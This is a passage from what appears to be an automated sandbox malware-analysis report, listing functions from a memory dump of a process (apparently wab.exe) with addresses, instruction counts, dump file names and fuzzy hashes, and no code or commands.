                                                              • Instruction Fuzzy Hash: 3681A0B2E001168BDF14CFE4CC81B9DB7B6EB88314F15856BD919BB260D635A9508FA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024E284 Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43dfcdcbc454be410eaa98984d3c4331dfa8622d199f04df28e129fbf628a99f
                                                              • Instruction ID: c3668c1b2b8c13aee517e3a3eeeda0b7f6adac03a2b0967695f74500be85ff3f
                                                              • Opcode Fuzzy Hash: 43dfcdcbc454be410eaa98984d3c4331dfa8622d199f04df28e129fbf628a99f
                                                              • Instruction Fuzzy Hash: D2814B71A00609AFEB15CFE5CC80BEEBBBAFF48354F10442AE555A7250D770AD65CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202A62A0 Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7b6d437874915069b3aff7d74c0ff81f4e2ec20efa3f60bdd30f1b892b678d
                                                              • Instruction ID: bd429d6787289ad3bce5daac9c17395933fcdd932af0701fb1aa880cbe460dff
                                                              • Opcode Fuzzy Hash: be7b6d437874915069b3aff7d74c0ff81f4e2ec20efa3f60bdd30f1b892b678d
                                                              • Instruction Fuzzy Hash: AC71F132200B01EFDB228F94CC49F5AB7E6EF48760F10446AE6159B3E0DB75E969DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2029035C Relevance: .2, Instructions: 198COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction ID: 66ddfa1868e3cab779fbb92095f9b77edf5d59ecac9fa239ac7da9741973d92b
                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                              • Instruction Fuzzy Hash: 18713971A00619AFCB10CFE9CD85BAEBBB9FF48710F10456AE505A7290DA34AA55CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202D132D Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e22650dbfcf171fd7ee6d0713b13e4a5f56835edd2b0d74e548905a051390bf
                                                              • Instruction ID: 2c574458a946d98d63ccc60d295a62fd4649bca5e8d3aa3309d9329140553bf3
                                                              • Opcode Fuzzy Hash: 5e22650dbfcf171fd7ee6d0713b13e4a5f56835edd2b0d74e548905a051390bf
                                                              • Instruction Fuzzy Hash: E6816F76A002559FCB09CF98C880AAEB7F1FF88300F1581AAD859AB755D734EE51CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202D903E Relevance: .2, Instructions: 186COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a77b0c226fe2106849b5d71ff431fe66fda42b40fe29736ea28a7a8ac4573be6
                                                              • Instruction ID: feea8a3f7784544e04580cbcf59a23403a7b69850f721c69b89b6e6d13d7e29f
                                                              • Opcode Fuzzy Hash: a77b0c226fe2106849b5d71ff431fe66fda42b40fe29736ea28a7a8ac4573be6
                                                              • Instruction Fuzzy Hash: A161CF72604616AFD715CFA4CC84BABBBA9FF88750F00861AF85897344DB34ED21CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202D92A6 Relevance: .2, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f16416ae7f7abd0110a4fec3fc4589fa15968de1bca0dad5fd98d98c614110e0
                                                              • Instruction ID: d3f1d5682fc04aa4b172969000e6ac2f1d58817a93f02e91fcef14e417deef3d
                                                              • Opcode Fuzzy Hash: f16416ae7f7abd0110a4fec3fc4589fa15968de1bca0dad5fd98d98c614110e0
                                                              • Instruction Fuzzy Hash: 9E61BF326187428BD301CFE4CC95B5AB7E4BF90704F1444AEB985AB399DB35EC26CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020B2D3 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c07f1f908dcaa0c0e3e5e56d7604be24c1322f55ffa410885c155abc9fbc7410
                                                              • Instruction ID: f308f905a3df1fac8a052448661607e7624974bc9fffe1cdf9bb9c1da1eb23b6
                                                              • Opcode Fuzzy Hash: c07f1f908dcaa0c0e3e5e56d7604be24c1322f55ffa410885c155abc9fbc7410
                                                              • Instruction Fuzzy Hash: 85414871601B019FC7268FD5CC81B16B7BAEF64710F21806BF6489B251E734ED618F90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024B570 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c70169dff9eda038d0d890e088ad2c9ef2b4a80c328db39cefccd914829110d4
                                                              • Instruction ID: 361e266e721218d47220005c99b60b20f47d2287cc60da1dc68345bacd26f6e6
                                                              • Opcode Fuzzy Hash: c70169dff9eda038d0d890e088ad2c9ef2b4a80c328db39cefccd914829110d4
                                                              • Instruction Fuzzy Hash: 8A510DB11056419FE325DFA4CC82F5BB7A8EB94724F10062FF910872E1CB34E964DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2028D5D0 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                              • Instruction ID: a0634dde00e19bfef7c240648417115dc848bad12ee2194262c61eab01cf2b4b
                                                              • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                              • Instruction Fuzzy Hash: 0051B47A6002179BCB009FE49C41A7BB7EAEF94644F10442BFA4487291F634DD79DBB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202395DA Relevance: .2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cd7f3cbe250e346e07d9198fb55662061d0be94c83a6e3d8b8acb04ff31e1f3
                                                              • Instruction ID: bb6246189a73e152a049cbdf42c2257e3a0a3b5538dbda46e8f11955852b9edd
                                                              • Opcode Fuzzy Hash: 8cd7f3cbe250e346e07d9198fb55662061d0be94c83a6e3d8b8acb04ff31e1f3
                                                              • Instruction Fuzzy Hash: 5D519F719012099FEB228FE5CD82BDDBBB8EF06300F60412BE990A7191DB71A964DF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20217152 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d33691a7b1de707b78319f2a961cfc6bdba73923c328158680b5a5f306a4c47f
                                                              • Instruction ID: 7d7df5c5a5cdd122057a86af32edc9c8d764b87fe8361fca0b5aa9b6288582d6
                                                              • Opcode Fuzzy Hash: d33691a7b1de707b78319f2a961cfc6bdba73923c328158680b5a5f306a4c47f
                                                              • Instruction Fuzzy Hash: 2351CD31A10616AFEB09CFE8CC44B5DF7F5BF94310F20802BE505932A1DB74AA61DB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024E443 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 819d7bc8b6743cf5386f48e17762b9453f90e83d46134e32d8b9e4aa40ce8650
                                                              • Instruction ID: 9e64e789706cb781b313168d62baa3e5e6d24973e40c5e8c5a4422168aba4610
                                                              • Opcode Fuzzy Hash: 819d7bc8b6743cf5386f48e17762b9453f90e83d46134e32d8b9e4aa40ce8650
                                                              • Instruction Fuzzy Hash: 8A515771600A059FDB25DFE4CD84F9AB3B9FB18654F40046BE505A76A0D738BE64CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202345B1 Relevance: .2, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction ID: 727225d65efd4c4472cf0abf249dc5f5915e71335a919308c2f05a46ddd3ecf0
                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                              • Instruction Fuzzy Hash: 2C5171B1E0021A9BDF15CFD5C841BEEBBB9AF45754F1040ABEA14AB250D734EE54CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202DD26B Relevance: .2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                              • Instruction ID: 173966fac9b0cd7b749355cdf338eda7ecf5f3a907f7943492b48d0d97b03a17
                                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                              • Instruction Fuzzy Hash: A45159726087429FD700CFA8C881B5ABBE5FBC9344F14892EF99497381D734E955CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202151ED Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c713859994c0c5bb2c25718ab4e8cbb9a50a46b22fcfd4c6803849f8e97becd
                                                              • Instruction ID: d2a4f3f923d5bc9aeb11faaaf384a127330ad1f17983b15898cd248145c182f1
                                                              • Opcode Fuzzy Hash: 1c713859994c0c5bb2c25718ab4e8cbb9a50a46b22fcfd4c6803849f8e97becd
                                                              • Instruction Fuzzy Hash: D5517D31A15225DFDB11CFE4CC81B9EF3F9AB08754F10409BE810E7252D7B8ADA09B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2024A430 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88b1f3ec3a797c0b1f98c9b7476b6adf8a9b8f4af48319e9087a805db4b0fde6
                                                              • Instruction ID: 5451675f2d55f2b6ad59821d29bd729d02a8f493759ae0811b9738938e51d591
                                                              • Opcode Fuzzy Hash: 88b1f3ec3a797c0b1f98c9b7476b6adf8a9b8f4af48319e9087a805db4b0fde6
                                                              • Instruction Fuzzy Hash: 27410B75E05655EBC70DDFE89C81F5A376EAB64304F40042BFD01AB251D779AC20AB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202E35D7 Relevance: .1, Instructions: 139COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                              • Instruction ID: 94f3aaf6a320b60c6afa48485b9f0543ddbe8b0762294af2187ccb5be76a5f35
                                                              • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                              • Instruction Fuzzy Hash: D851BDB1240606EFCB05CF95C980A52FBB9FF45305F5580AAE9089F212E371FA95CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 202401F8 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34121257a9c150ecefac5a204940152a243ec31028eff15670c2217d6265b49b
                                                              • Instruction ID: e71823bcd232a42a47fc55f3ff7e67337eb0c198b3f1ad9330b3f4b8dd005859
                                                              • Opcode Fuzzy Hash: 34121257a9c150ecefac5a204940152a243ec31028eff15670c2217d6265b49b
                                                              • Instruction Fuzzy Hash: AA419D35D112199BCB08CFD8C880AEDBBB4BF48710F10816BE815E7280D779ADA1CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2021D534 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba0c0e25214dd01b4b006e1d68072632b41e13d4f75f854bfdb79612a7eef484
                                                              • Instruction ID: 2bb5bc644a79345fc86841f68603017bab6d4792f82538d45468f0863a7bf747
                                                              • Opcode Fuzzy Hash: ba0c0e25214dd01b4b006e1d68072632b41e13d4f75f854bfdb79612a7eef484
                                                              • Instruction Fuzzy Hash: 5C51C131644A92DFC711CF98CD80F1AB3F6EB40794F554566F804CBAA2D738EDA0CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2028D1C0 Relevance: .1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                              • Instruction ID: 84b06d566188231c9b6ed085ad5e75bfce49c7923954a37fef2e544eab2df934
                                                              • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                              • Instruction Fuzzy Hash: A7510975E00206DFCB08CFA9C981A99BBF1FF48314B14856ED81997746D734EA94CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 20216154 Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89ec04eae0ca2971dda5f8f33febd86a225a3a1f90598675019f81fa253aacdc
                                                              • Instruction ID: f603a56da6291dbea1df32ac66026f1ce0bffff96b07549d632aa6a8bffa74e4
                                                              • Opcode Fuzzy Hash: 89ec04eae0ca2971dda5f8f33febd86a225a3a1f90598675019f81fa253aacdc
                                                              • Instruction Fuzzy Hash: A0510370900616DBD7258FE4CC45BA9B7F1AF15314F1082ABE928A72D2D738ADE5CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020B136 Relevance: .1, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_201e0000_wab.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7f576d16fec56049cb6be4bd2af64ff6566618be7bb71be7eefd1b03ffe88c4
                                                              • Instruction ID: b53b5c333b003f5b503d52d945d8b57b5b83921b1a02848f2eee268cccfceb15
                                                              • Opcode Fuzzy Hash: e7f576d16fec56049cb6be4bd2af64ff6566618be7bb71be7eefd1b03ffe88c4
                                                              • Instruction Fuzzy Hash: 8B41BD70640712AFD7269FE4CC81B1ABBB9EB24790F10842BE9149B260E774ED60CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 2020A020 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2264756204.00000000201E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 201E0000, based on PE: true
                                                              • Associated: 0000000C.00000002.2264756204.0000000020309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002030D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2264756204.000000002037E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
